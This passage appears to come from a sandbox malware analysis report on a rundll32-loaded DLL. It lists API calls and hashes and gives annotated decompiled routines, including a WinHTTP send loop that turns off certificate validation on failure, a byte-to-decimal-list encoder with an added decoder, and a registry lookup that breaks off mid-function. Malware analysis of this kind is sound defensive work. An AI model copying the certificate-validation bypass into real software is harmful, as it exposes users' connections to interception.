                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • memset.NTDLL ref: 05581219
                                                            • Part of subcall function 05589776: memset.NTDLL ref: 0558979C
                                                            • Part of subcall function 05589776: memcpy.NTDLL ref: 055897C4
                                                            • Part of subcall function 05589776: GetLastError.KERNEL32(00000010,00000218,05594EAD,00000100,?,00000318,00000008), ref: 055897DB
                                                            • Part of subcall function 05589776: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,05594EAD,00000100), ref: 055898BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastmemset$AllocateHeapmemcpy
                                                          • String ID: tLWj
                                                          • API String ID: 4290293647-3825524646
                                                          • Opcode ID: 4f05ab84869ab89dba04aefb861e7fca713a04a29013f73e4cff728d23cceeff
                                                          • Instruction ID: 125c7617992294dba728b7f781950c71026fd32e60f286af1afaf1822cfd89e6
                                                          • Opcode Fuzzy Hash: 4f05ab84869ab89dba04aefb861e7fca713a04a29013f73e4cff728d23cceeff
                                                          • Instruction Fuzzy Hash: FA01FD30601B096BC721EE6ADC44FAB3BE9BF85710F00842AFC46A6240D774E905CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(00E53E52), ref: 00E55F69
                                                            • Part of subcall function 00E53969: SysFreeString.OLEAUT32(?), ref: 00E53A48
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E55FA9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 3ce929ee460371d817ccc02dd7be3ad77a5d33b2aa264aa509c3cd41f2d2a088
                                                          • Instruction ID: e9060e3aea2d8d58acc48ddb3d46db40abf36f7a30b322cfe881cd8c3e0bd76e
                                                          • Opcode Fuzzy Hash: 3ce929ee460371d817ccc02dd7be3ad77a5d33b2aa264aa509c3cd41f2d2a088
                                                          • Instruction Fuzzy Hash: 8A014F7650160AFFCB119FA9D809DEFBBB9EF44311F100821FD05B6161D7709A199BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0559C300), ref: 0557179E
                                                          • RtlLeaveCriticalSection.NTDLL(0559C300), ref: 055717DA
                                                            • Part of subcall function 05592EC9: lstrlen.KERNEL32(?,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F16
                                                            • Part of subcall function 05592EC9: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F28
                                                            • Part of subcall function 05592EC9: lstrcpy.KERNEL32(00000000,?), ref: 05592F37
                                                            • Part of subcall function 05592EC9: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F48
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 1872894792-0
                                                          • Opcode ID: 9e8439a3484179b57814b250b8278f2f3d15d9349caaac8efdda0d7b63a93400
                                                          • Instruction ID: fd8e49455aaa3ef5ed5cf384f491a0d5ff3607d1104ac55b0966b1c2f6d3f696
                                                          • Opcode Fuzzy Hash: 9e8439a3484179b57814b250b8278f2f3d15d9349caaac8efdda0d7b63a93400
                                                          • Instruction Fuzzy Hash: E9F0233A30121DAF8F246F99A5C9875FBB8FB8A151306024FF95653300CF755C00D790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0559BFFC), ref: 0557BCC8
                                                            • Part of subcall function 055909D7: GetSystemTimeAsFileTime.KERNEL32(?), ref: 05590A02
                                                            • Part of subcall function 055909D7: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05590A0F
                                                            • Part of subcall function 055909D7: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 05590A9B
                                                            • Part of subcall function 055909D7: GetModuleHandleA.KERNEL32(00000000), ref: 05590AA6
                                                            • Part of subcall function 055909D7: RtlImageNtHeader.NTDLL(00000000), ref: 05590AAF
                                                            • Part of subcall function 055909D7: RtlExitUserThread.NTDLL(00000000), ref: 05590AC4
                                                          • InterlockedDecrement.KERNEL32(0559BFFC), ref: 0557BCEC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                                          • String ID:
                                                          • API String ID: 1011034841-0
                                                          • Opcode ID: 836311287e81fcf931bf16859596965af73d9f4bc9d2c16eaaff0aa0a440718c
                                                          • Instruction ID: 8f490a513beb5fadc8479769e204f7f88a8275342ee0bb3824d2ce762f9ccc8f
                                                          • Opcode Fuzzy Hash: 836311287e81fcf931bf16859596965af73d9f4bc9d2c16eaaff0aa0a440718c
                                                          • Instruction Fuzzy Hash: FCE0D87334C12B9BDB215A76BC08B3ABA5EBB406B0F01CD15FCC2D1050EF24C49096D5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _t4;
                                                          				void* _t10;
                                                          				signed int _t11;
                                                          				void* _t13;

                                                          				// Shape of a DllMain: _a4 = hinstDLL, _a8 = fdwReason (1 = DLL_PROCESS_ATTACH, 0 = DLL_PROCESS_DETACH).
                                                          				// 0xe5a294 holds a reference count, so only the first attach initialises and only the last detach tears down.
                                                          				// (Parameter roles are inferred from the call pattern; the plugin does not name them.)
                                                          				_t13 = 1;  // @0x00e56954
                                                          				_t4 = _a8;  // @0x00e56955
                                                          				if(_t4 == 0) {  // @0x00e56958
                                                          					if(InterlockedDecrement(0xe5a294) == 0) {  // @0x00e5698a
                                                          						E00E5566B();  // @0x00e5698c
                                                          					}  // @0x00e5698c
                                                          				} else {  // @0x00e5695a
                                                          					if(_t4 == 1 && InterlockedIncrement(0xe5a294) == 1) {  // @0x00e5695b
                                                          						_t10 = E00E5682B(_t11, _a4); // executed  @0x00e56970 - creates the module's private heap (HeapCreate, see APIs below)
                                                          						if(_t10 != 0) {  // @0x00e56977
                                                          							_t13 = 0;  // @0x00e56979 - initialisation failed: return FALSE, which for a DllMain makes the loader unload the module
                                                          						}  // @0x00e56979
                                                          					}  // @0x00e56977
                                                          				}  // @0x00e5695b
                                                          				return _t13;  // @0x00e56994
                                                          			}

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(00E5A294), ref: 00E56962
                                                            • Part of subcall function 00E5682B: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001), ref: 00E56840
                                                          • InterlockedDecrement.KERNEL32(00E5A294), ref: 00E56982
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: 64ee9e4e07e6bfbc4a2bf5681e77dc20cd39d1868a5eab0724d4164a4de5ccaa
                                                          • Instruction ID: 8467b9abb5ad84d2f72bcb1475f326ec9416de30bf7f133a475e8593fa06bb95
                                                          • Opcode Fuzzy Hash: 64ee9e4e07e6bfbc4a2bf5681e77dc20cd39d1868a5eab0724d4164a4de5ccaa
                                                          • Instruction Fuzzy Hash: 92E01A352083229ACA356B648C45B9E6790AB95B4BF847E24BD85F30A1CB30984D9292
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00E56997(void* __edi, void* _a4) {
                                                          				int _t7;
                                                          				int _t12;

                                                          				// E00E541D4 writes a heap-allocated result into _a4 (passed by address) and returns its length.
                                                          				// The result is copied into the caller's buffer (__edi), NUL-terminated, and the temporary freed.
                                                          				_t7 = E00E541D4(__edi, _a4,  &_a4); // executed  @0x00e569a3
                                                          				_t12 = _t7;  // @0x00e569a8
                                                          				if(_t12 != 0) {  // @0x00e569ac
                                                          					memcpy(__edi, _a4, _t12);  // @0x00e569b3
                                                          					 *((char*)(__edi + _t12)) = 0;  // @0x00e569be
                                                          					E00E513CC(_a4);  // @0x00e569c2 - RtlFreeHeap wrapper (see APIs below)
                                                          				}  // @0x00e569c2
                                                          				return _t12;  // @0x00e569cb
                                                          			}

                                                          APIs
                                                            • Part of subcall function 00E541D4: memcpy.NTDLL(00000000,00000110,{Q,{Q,?,?,?,?,?,00E552EA,?), ref: 00E5420A
                                                            • Part of subcall function 00E541D4: memset.NTDLL ref: 00E54280
                                                            • Part of subcall function 00E541D4: memset.NTDLL ref: 00E54294
                                                          • memcpy.NTDLL({Q,?,00000000,{Q,?,?,?,?,00E552EA,?,?,{Q,?), ref: 00E569B3
                                                            • Part of subcall function 00E513CC: RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpymemset$FreeHeap
                                                          • String ID: {Q
                                                          • API String ID: 3053036209-1336059103
                                                          • Opcode ID: 13af1243c0b10fe6991d438999edb1d00b27d356b3e8aba016f0faff810b262d
                                                          • Instruction ID: bda5de961c2087f11ece6d5b809f7b7487febca00571b96ee44877c3b0d55efe
                                                          • Opcode Fuzzy Hash: 13af1243c0b10fe6991d438999edb1d00b27d356b3e8aba016f0faff810b262d
                                                          • Instruction Fuzzy Hash: 33E08CB6401529B6CB122A94DC01EEFBF9C8F52792F005824FF48AA211D631DA68A3E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,055985A0,0000002C,05585C21,059B8E6E,?,00000000,055897A9,?,00000318), ref: 0557C306
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeVirtual
                                                          • String ID: u
                                                          • API String ID: 1263568516-4067256894
                                                          • Opcode ID: 031d7f351d0a79a76bbb1f94972cc00121d3d9a196d24fa8b5804e02ade87353
                                                          • Instruction ID: 6bf95b8d719e0c466f730e3d70d5e3967dfd50b335235a1feeb7bcfbe0f7b40d
                                                          • Opcode Fuzzy Hash: 031d7f351d0a79a76bbb1f94972cc00121d3d9a196d24fa8b5804e02ade87353
                                                          • Instruction Fuzzy Hash: 02D01731E00219DBCF219BA4E84A99FFB71BF08710F608224E56173190C6341955DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 32%
                                                          			E00E55DD0(intOrPtr _a4, signed int _a8) {
                                                          				long _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				void* _t14;
                                                          				long _t15;
                                                          				char* _t17;
                                                          				intOrPtr* _t19;
                                                          				signed int _t22;

                                                          				// Unresolved import at 0x7042e700. The seven-argument call below (handle, headers, headers length,
                                                          				// optional data, its length, total length, context) and the 0x2f.. error codes fit WinHttpSendRequest;
                                                          				// this is inferred from the call shape, the plugin does not resolve the name.
                                                          				_t19 = __imp__; // 0x7042e700  @0x00e55dd7
                                                          				_t22 =  ~_a8;  // @0x00e55de4
                                                          				_v12 = 0;  // @0x00e55de6 - set once the security flags have been relaxed, so the downgrade is tried only once
                                                          				asm("sbb esi, esi");  // @0x00e55de9 - neg/sbb idiom: _t22 = (_a8 != 0) ? -1 : 0, i.e. headers length -1L ("NUL-terminated") when headers are supplied
                                                          				while(1) {  // @0x00e55e2e
                                                          					_v8 = 0;  // @0x00e55e36
                                                          					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed  @0x00e55e3c
                                                          					if(_t14 != 0) {  // @0x00e55e40
                                                          						break;
                                                          					}
                                                          					_t15 = GetLastError();  // @0x00e55ded
                                                          					_v8 = _t15;  // @0x00e55df8
                                                          					if(_t15 != 0x2f8f) {  // @0x00e55dfb - 0x2f8f = 12175 = ERROR_WINHTTP_SECURE_FAILURE
                                                          						if(_t15 == 0x2f00) {  // @0x00e55e2c - 0x2f00 = 12032 = ERROR_WINHTTP_RESEND_REQUEST: send again unchanged
                                                          							continue;
                                                          						}
                                                          					} else {  // @0x00e55dfd
                                                          						_v16 = 0x3300;  // @0x00e55e00 - SECURITY_FLAG_IGNORE_UNKNOWN_CA (0x100) | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE (0x200) | SECURITY_FLAG_IGNORE_CERT_CN_INVALID (0x1000) | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID (0x2000)
                                                          						if(_v12 == 0) {  // @0x00e55e07
                                                          							_t17 =  &_v16;  // @0x00e55e0b
                                                          							__imp__(_a4, 0x1f, _t17, 4);  // @0x00e55e14 - option 0x1f = 31 = WINHTTP_OPTION_SECURITY_FLAGS: certificate validation is switched off on the request handle, so the server may present an untrusted, mismatched or expired certificate
                                                          							if(_t17 == 0) {  // @0x00e55e1c - eax reused by the decompiler: the set-option call failed
                                                          								_v8 = GetLastError();  // @0x00e55e4a
                                                          							} else {  // @0x00e55e1e
                                                          								_v12 = 1;  // @0x00e55e1e
                                                          								continue;
                                                          							}  // @0x00e55e1e
                                                          						}  // @0x00e55e1c
                                                          					}  // @0x00e55e07
                                                          					L9:  // @0x00e55e4d
                                                          					return _v8;  // @0x00e55e54
                                                          				}  // @0x00e55e54
                                                          				goto L9;
                                                          			}

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID:
                                                          • API String ID: 1452528299-0
                                                          • Opcode ID: 9c06ca2052c0ef8adf9ef9a4144b0c093e624ce9c3dd99ee71f48b7bacddf210
                                                          • Instruction ID: b22cc31ecbfd7165d7c4b22eacdc4e101d2a9984f2a98d3cc686b141d541c74a
                                                          • Opcode Fuzzy Hash: 9c06ca2052c0ef8adf9ef9a4144b0c093e624ce9c3dd99ee71f48b7bacddf210
                                                          • Instruction Fuzzy Hash: 24015736900619FBCF109F96C8599EEBBB8EB84756F208866E900F2150DB708B48DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?), ref: 0557FAB1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: a22b34d015c4d48b50f3aecc00bc1633a1dbe193eb0061afec7356939a2aec7f
                                                          • Instruction ID: 9c117e7cc19368c6e6ee9bb3a02a190e04f083e635eb3bb5c3aea3cc56313502
                                                          • Opcode Fuzzy Hash: a22b34d015c4d48b50f3aecc00bc1633a1dbe193eb0061afec7356939a2aec7f
                                                          • Instruction Fuzzy Hash: F5313CB1A00619EFCB10DF98E495DADBBB5FF48324F55806AE209EB200D734AD45DF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			// Decompiler output (Joe Sandbox IDA plugin). Editor's reading of the routine: it renders
                                                          			// __eax bytes at *_a4 as a comma-separated decimal list ("1,2,255"), stores the heap buffer
                                                          			// in *_a8 and its length in *_a12, and returns a Win32 error code (0 on success,
                                                          			// 8 = ERROR_NOT_ENOUGH_MEMORY when the heap allocation fails).
                                                          			E00E56FEA(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                                                          				signed int _v5;
                                                          				signed int _v12;
                                                          				void* _t32;
                                                          				signed int _t37;
                                                          				signed int _t39;
                                                          				signed char _t45;
                                                          				void* _t49;
                                                          				char* _t51;
                                                          				signed int _t65;
                                                          				signed int _t66;
                                                          				signed int _t69;
                                                          
                                                          				_v12 = _v12 & 0x00000000;
                                                          				_t69 = __eax;
                                                          				_t32 = RtlAllocateHeap( *0xe5a290, 0, __eax << 2); // executed; 4 bytes per input byte, enough for "255,"
                                                          				_t49 = _t32;
                                                          				if(_t49 == 0) {
                                                          					_v12 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                          				} else {
                                                          					 *_a8 = _t49;
                                                          					do {
                                                          						_t45 =  *_a4;
                                                          						asm("cdq");
                                                          						_t65 = 0x64;
                                                          						_t37 = (_t45 & 0x000000ff) / _t65; // hundreds digit
                                                          						_v5 = _t37;
                                                          						if(_t37 != 0) {
                                                          							 *_t49 = _t37 + 0x30; // written only when non-zero: no leading zeros
                                                          							_t49 = _t49 + 1;
                                                          							_t45 = _t45 + _t37 * 0x9c; // 0x9c == -100 mod 256: subtract hundreds*100
                                                          						}
                                                          						asm("cdq");
                                                          						_t66 = 0xa;
                                                          						_t39 = (_t45 & 0x000000ff) / _t66; // tens digit
                                                          						if(_t39 != 0 || _v5 != _t39) { // written when non-zero, or when a hundreds digit precedes it (e.g. "105")
                                                          							 *_t49 = _t39 + 0x30;
                                                          							_t49 = _t49 + 1;
                                                          							_t45 = _t45 + _t39 * 0xf6; // 0xf6 == -10 mod 256: subtract tens*10
                                                          						}
                                                          						_a4 = _a4 + 1;
                                                          						 *_t49 = _t45 + 0x30; // units digit, always written
                                                          						 *(_t49 + 1) = 0x2c; // ','
                                                          						_t49 = _t49 + 2;
                                                          						_t69 = _t69 - 1;
                                                          					} while (_t69 != 0);
                                                          					_t51 = _t49 - 1; // step back over the trailing comma
                                                          					 *_a12 = _t51 -  *_a8; // length of the list without terminator
                                                          					 *_t51 = 0; // NUL-terminate in place of that comma
                                                          				}
                                                          				return _v12;
                                                          			}
                                                          Statement addresses for the listing above (shown beside each decompiled line in the original report; flattened by extraction): 0x00e56fef to 0x00e57089

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00E57002
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: ea724e61b3a5a9e886806b1c16888947bd5e526ad2106bf99e9ded861f54cf59
                                                          • Instruction ID: 132f1d4c0283f9a63f3ad57b365e1c23df989ac5cf3ee77784cef136ced7cdc3
                                                          • Opcode Fuzzy Hash: ea724e61b3a5a9e886806b1c16888947bd5e526ad2106bf99e9ded861f54cf59
                                                          • Instruction Fuzzy Hash: 541129712493449FEB058F29D851BE97BA5DB23359F14508EE880AB2D2C277890FC760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
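The routine decompiled above (E00E56FEA) is the sample's byte-to-text encoder: every byte becomes its decimal value and the values are joined with commas. As an added example, written by the editor and not taken from the sample or from the Joe Sandbox report, here is the same transformation in plain C next to its inverse, which the report does not show but which an analyst needs to turn a captured list back into bytes. Function names, the `malloc`-based buffer (the sample uses RtlAllocateHeap) and the sample inputs are the editor's own choices; the inverse rejects anything that the encoder could not have produced (leading garbage, empty fields, values above 255, a trailing comma).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Re-implementation of the decompiled routine: n bytes -> "1,2,255".
 * Mirrors the original's choices: no leading zeros, 4 output bytes per input
 * byte (worst case "255,"), the last comma replaced by the NUL terminator,
 * NULL for an empty input (the caller in the sample rejects n == 0 itself).
 * Caller frees the result. */
char *bytes_to_decimal_list(const unsigned char *in, size_t n, size_t *out_len)
{
    if (n == 0)
        return NULL;
    char *buf = malloc(n * 4);
    if (!buf)
        return NULL;
    char *p = buf;
    for (size_t i = 0; i < n; i++) {
        unsigned v = in[i];
        unsigned hundreds = v / 100;
        if (hundreds) {                 /* hundreds digit only when non-zero */
            *p++ = (char)('0' + hundreds);
            v -= hundreds * 100;
        }
        unsigned tens = v / 10;
        if (tens || hundreds) {         /* tens digit: non-zero, or "105"-style zero */
            *p++ = (char)('0' + tens);
            v -= tens * 10;
        }
        *p++ = (char)('0' + v);         /* units digit, always */
        *p++ = ',';
    }
    p--;                                /* overwrite the trailing comma */
    *p = '\0';
    if (out_len)
        *out_len = (size_t)(p - buf);
    return buf;
}

/* Inverse (editor's addition, not on the page): "1,2,255" -> bytes.
 * Returns the number of bytes written, or 0 on malformed input or when
 * the output buffer is too small. */
size_t decimal_list_to_bytes(const char *s, unsigned char *out, size_t cap)
{
    size_t n = 0;
    while (*s) {
        if (*s < '0' || *s > '9')      /* every field must start with a digit */
            return 0;
        unsigned v = 0;
        while (*s >= '0' && *s <= '9') {
            v = v * 10 + (unsigned)(*s - '0');
            if (v > 255)                /* a byte cannot exceed 255 */
                return 0;
            s++;
        }
        if (n >= cap)
            return 0;
        out[n++] = (unsigned char)v;
        if (*s == ',') {
            s++;
            if (!*s)                    /* "1,2," is not something the encoder emits */
                return 0;
        } else if (*s) {
            return 0;                   /* any separator other than ',' */
        }
    }
    return n;
}

/* Encode a constructed sample, decode it again, check both directions.
 * Returns 1 when the round trip agrees byte for byte. */
int round_trip_self_check(void)
{
    const unsigned char sample[] = {0, 7, 10, 100, 255, 42};   /* constructed input */
    size_t len = 0;
    char *s = bytes_to_decimal_list(sample, sizeof sample, &len);
    if (!s)
        return 0;
    int ok = (strcmp(s, "0,7,10,100,255,42") == 0) && (len == 17);
    unsigned char back[sizeof sample];
    size_t n = decimal_list_to_bytes(s, back, sizeof back);
    ok = ok && n == sizeof sample && memcmp(back, sample, n) == 0;
    free(s);
    return ok;
}

int main(void)
{
    /* Constructed input: the first four bytes of a PE header ("MZ", 0x90, 0x00). */
    const unsigned char payload[] = {0x4d, 0x5a, 0x90, 0x00};
    size_t len = 0;
    char *s = bytes_to_decimal_list(payload, sizeof payload, &len);
    if (!s)
        return 1;
    printf("encoded: %s (%zu chars)\n", s, len);
    unsigned char back[sizeof payload];
    size_t n = decimal_list_to_bytes(s, back, sizeof back);
    printf("decoded %zu byte(s), round trip %s\n", n,
           (n == sizeof payload && memcmp(back, payload, n) == 0) ? "ok" : "FAILED");
    free(s);
    return round_trip_self_check() ? 0 : 1;
}
```

The decoder is the piece worth keeping: when a string of this shape turns up in a memory dump or a registry value, feeding it to `decimal_list_to_bytes` recovers the raw bytes for hashing or further analysis, and its strict parsing means a truncated or edited value is reported as malformed rather than silently decoded.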

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?), ref: 055766DA
                                                            • Part of subcall function 0558F7F5: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0559C300), ref: 0558F80C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HandleInformationModuleProcessQuery
                                                          • String ID:
                                                          • API String ID: 2776635927-0
                                                          • Opcode ID: 086c94e212cd88c33070958ba02936cf3e5e4bb6a8b5cfa18eef0d98c2e2a031
                                                          • Instruction ID: 6d0c7a61c2e033c85c06390278b60d1a74539fdd209340657942109c4b9ec96d
                                                          • Opcode Fuzzy Hash: 086c94e212cd88c33070958ba02936cf3e5e4bb6a8b5cfa18eef0d98c2e2a031
                                                          • Instruction Fuzzy Hash: 7D21CD75300A49EFDB20DF9AE990D6977A9FF402D0724846EE946CB210EB31ED00CB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0557CD08
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 3b7a15c016b54e592f896d866459540557639abd144d3f02bf9fd363e312236f
                                                          • Instruction ID: 45800e719039ff82d706b9d2569431b4494bd9ac17207d9674ae390a9c70ce25
                                                          • Opcode Fuzzy Hash: 3b7a15c016b54e592f896d866459540557639abd144d3f02bf9fd363e312236f
                                                          • Instruction Fuzzy Hash: 4311CC3220420DAFDF019F99DC419DA7FA9FF49370B058125FD2996160C735DD21DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 34%
                                                          			// Decompiler output. Editor's reading: look up a string value under HKEY_LOCAL_MACHINE
                                                          			// through a subroutine that returns its result in a VARIANT-shaped stack struct (type tag
                                                          			// at _v20, payload at _v12, i.e. offset 8), copy the string out, and free the BSTR.
                                                          			// Returns 0 on success, the failing HRESULT from the lookup, 1 if the value is not a
                                                          			// string, or 8 (ERROR_NOT_ENOUGH_MEMORY) if the copy fails.
                                                          			E00E55ED2(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                          				intOrPtr _v12;
                                                          				void* _v18;
                                                          				short _v20;
                                                          				intOrPtr _t15;
                                                          				short _t17;
                                                          				intOrPtr _t19;
                                                          				short _t23;
                                                          
                                                          				_t23 = 0;
                                                          				_v20 = 0;
                                                          				asm("stosd"); // three stosd + one stosw zero the remaining 14 bytes of the 16-byte VARIANT
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosw");
                                                          				_t15 =  *0xe5a2d4; // 0x435d5a8  (delta added to two data references; resolved values in the comments below)
                                                          				_t4 = _t15 + 0xe5b394; // 0x51b893c
                                                          				_t20 = _t4;
                                                          				_t6 = _t15 + 0xe5b124; // 0x650047
